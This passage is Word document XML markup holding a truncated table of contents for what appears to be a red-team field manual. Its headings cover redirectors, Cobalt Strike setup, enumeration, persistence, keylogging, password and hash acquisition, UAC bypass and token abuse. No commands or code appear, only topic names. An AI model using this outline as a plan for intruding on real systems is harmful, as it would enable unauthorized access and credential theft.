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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u81yq7mah3v8"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1">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="648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c76t0ihccgkc">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">How to Use This Book</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _c76t0ihccgkc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2">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_8s2n6bkyi5r3">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Setting Up a Redirector</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _8s2n6bkyi5r3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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_w4yl7hqazwun">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using SSH as a Bent Pipe</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _w4yl7hqazwun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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_c0ywgi1xvejq">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Tables</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _c0ywgi1xvejq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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_nstinv3f3prh">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cobalt Strike</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _nstinv3f3prh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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_95d3puv7wtg9">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cobalt Strike Setup</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _95d3puv7wtg9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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_g1p6ce93bkcm">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sleep Time</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _g1p6ce93bkcm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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_aps166rglyzk">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes and Labeling</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _aps166rglyzk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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_tapjfxhml504">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Other Hints</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _tapjfxhml504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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_id8v6u1kib5">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Logging</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _id8v6u1kib5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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_j9n8qw4k4365">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Enumeration</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _j9n8qw4k4365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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_rqdo25ylh66d">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _rqdo25ylh66d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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_hs0l9rnjd7w8">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">??dnsrecon??</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _hs0l9rnjd7w8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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_6yi7wq1jppwl">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Situational Awareness</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _6yi7wq1jppwl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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_kgkzg48b45m1">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _kgkzg48b45m1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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_pxqlxdxbqn93">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _pxqlxdxbqn93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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_ccfk5p4s2dck">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cobalt Strike</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _ccfk5p4s2dck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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_7rwnz1uxigd3">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _7rwnz1uxigd3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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_yvyfv9we99go">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User Persistence</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _yvyfv9we99go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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_ln04qzcglfwj">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Other Hints</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _ln04qzcglfwj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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_fgv5lpo10mg9">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SYSTEM Persistence</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _fgv5lpo10mg9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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_h1lawc50fc23">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation Positioning</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _h1lawc50fc23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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_3uf1dwxmw28u">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Mining</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _3uf1dwxmw28u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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_qf4gfn4d1y2i">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Network &amp; Local Queries</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _qf4gfn4d1y2i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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_k79fmhrdy8yx">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Keylogging</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _k79fmhrdy8yx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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_p126a0buolwp">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshot</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _p126a0buolwp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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_p858fpxy9est">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch Activity</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _p858fpxy9est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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_at1knky320du">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Passwords &amp; Hash Acquisition</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _at1knky320du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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_wtkz8hpl4x4h">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _wtkz8hpl4x4h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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_rvti6igule5e">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Runas</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _rvti6igule5e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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_bnpshiyvokwi">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass User Account Control (UAC)</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _bnpshiyvokwi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6480"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_z16xlegyuj9x">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tokens</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _z16xlegyuj9x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6480"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:contextualSpacing w:val="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_2rds7z6c87gd">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
